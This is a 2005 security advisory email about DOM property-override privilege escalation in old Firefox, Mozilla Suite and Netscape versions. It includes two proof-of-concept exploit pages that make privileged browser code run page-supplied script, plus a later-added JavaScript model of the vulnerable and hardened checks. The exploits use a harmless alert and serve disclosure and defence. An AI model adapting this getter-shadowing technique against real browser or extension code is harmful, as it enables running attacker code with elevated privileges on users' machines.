From: SecuriTeam <support@securiteam.com>
To: [email protected]
Date: 1 May 2005 17:40:28 +0200
Subject: [NEWS] Multiple Privilege Escalation Via DOM Property Overrides in Mozilla Suite, Firefox and Netscape
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050501154557.2D96E57F7@mail.tyumen.ru>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple Privilege Escalation Via DOM Property Overrides in Mozilla Suite,
Firefox and Netscape
------------------------------------------------------------------------
SUMMARY
Multiple privilege escalation vulnerabilities in the DOM were found in
Mozilla-based web browsers (Mozilla Suite, Netscape and Firefox). They give
attackers the ability to install malicious code or steal data, requiring only
that the user perform commonplace actions such as clicking on a link or
opening the context menu.
DETAILS
Vulnerable Systems:
* Firefox version 1.0.2 and prior
* Mozilla Suite version 1.7.6 and prior
* Netscape version 7.2
Immune Systems:
* Firefox version 1.0.3
* Mozilla Suite version 1.7.7
Using eval() and other JavaScript functions, a script in a web page can
override properties and methods of DOM nodes and shadow their native values;
privileged code then sees the shadowed values unless it takes steps to get the
true underlying ones. The common cause in each case was privileged UI code
("chrome") being overly trusting of DOM nodes from the content window.
Exploit 1:
<body style="width:100%;height:100%;">
Click on document.
<script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);'body';";
document.body.__defineGetter__("localName", function() {
    var s = new String('BODY');
    s.toLowerCase = new Script(code);
    return s;
});
</script>
</body>
Exploit 2:
<script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);'';";
document.createElement("link").__proto__
    .__defineGetter__("rel", new Script(code));
</script>
<link rel="test"/>
Target of attack:

Firefox 1.0.2 - livemarkOnLinkAdded() in browser.js
    var erel = event.target.rel;

If pref "browser.chrome.site_icons" is true:

Firefox 1.0.2 - onLinkAdded() in tabbrowser.xml
    if (!event.target.rel.match((/(?:^|\s)icon(?:\s|$)/i)))
        return;

Mozilla 1.7.6 - onLinkAdded() in tabbrowser.xml
    if (!event.originalTarget.rel.match((/(?:^|\s)icon(?:\s|$)/i)))
        return;
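The shadowing the advisory describes, modelled as an added example that is not part of the advisory or of Mozilla's code: a constructed NativeLink class stands in for the native <link> element, naiveIsIcon() repeats the trusting rel check from onLinkAdded(), and safeIsIcon() takes the "true underlying value" route by capturing the native getter before content can redefine it.

```javascript
// Stand-in for a native <link> element: the real attribute lives in a
// private field that content script cannot reach directly. (Constructed
// for this example; not Mozilla's DOM implementation.)
class NativeLink {
  #rel;
  constructor(rel) { this.#rel = rel; }
  get rel() { return this.#rel; }
}

// Privileged ("chrome") side: capture the native accessor before any
// content script has had a chance to touch the prototype chain.
const nativeRelGetter =
  Object.getOwnPropertyDescriptor(NativeLink.prototype, "rel").get;

// Vulnerable pattern, as in onLinkAdded(): an ordinary property read
// walks the prototype chain, so a content-defined getter runs here with
// the caller's (chrome) privileges and can return any value it likes.
function naiveIsIcon(link) {
  return /(?:^|\s)icon(?:\s|$)/i.test(link.rel);
}

// Hardened pattern: reach the true underlying value through the saved
// native getter, reject objects that are not genuine native nodes, and
// refuse anything that is not a primitive string (a String object could
// carry a poisoned toLowerCase/match, as in Exploit 1).
function safeIsIcon(link) {
  let rel;
  try {
    rel = Reflect.apply(nativeRelGetter, link, []);
  } catch (e) {
    return false; // plain object impersonating a node: no private field
  }
  return typeof rel === "string" && /(?:^|\s)icon(?:\s|$)/i.test(rel);
}

// Content-side shadowing, modelled on Exploit 2: redefine "rel" on the
// shared prototype. The counter records how often chrome code ran it.
let contentGetterCalls = 0;
function contentOverrideRel() {
  NativeLink.prototype.__defineGetter__("rel", function () {
    contentGetterCalls++;
    return "icon";
  });
}
function contentGetterCallCount() { return contentGetterCalls; }
```

Run under Node: the counter shows the content-defined getter executes whenever the naive reader is used and never when the hardened one is.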
Workaround:
Update to the latest Firefox/Mozilla Suite web browser or disable
JavaScript support.
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1160>
Disclosure Timeline:
23-04-2005 - Vulnerability discovered
28-04-2005 - Detailed research
28-04-2005 - Vendor informed
28-04-2005 - Security companies informed
29-04-2005 - More security companies and CERT-FI informed
29-04-2005 - Advisory published
ADDITIONAL INFORMATION
The information has been provided by Juha-Matti Laurio
<juha-matti.laurio@netti.fi>.
The original article can be found at:
http://www.networksecurity.fi/advisories/netscape-dom.txt
For more information about the bug please visit the following site:
http://www.mozilla.org/security/announce/mfsa2005-41.html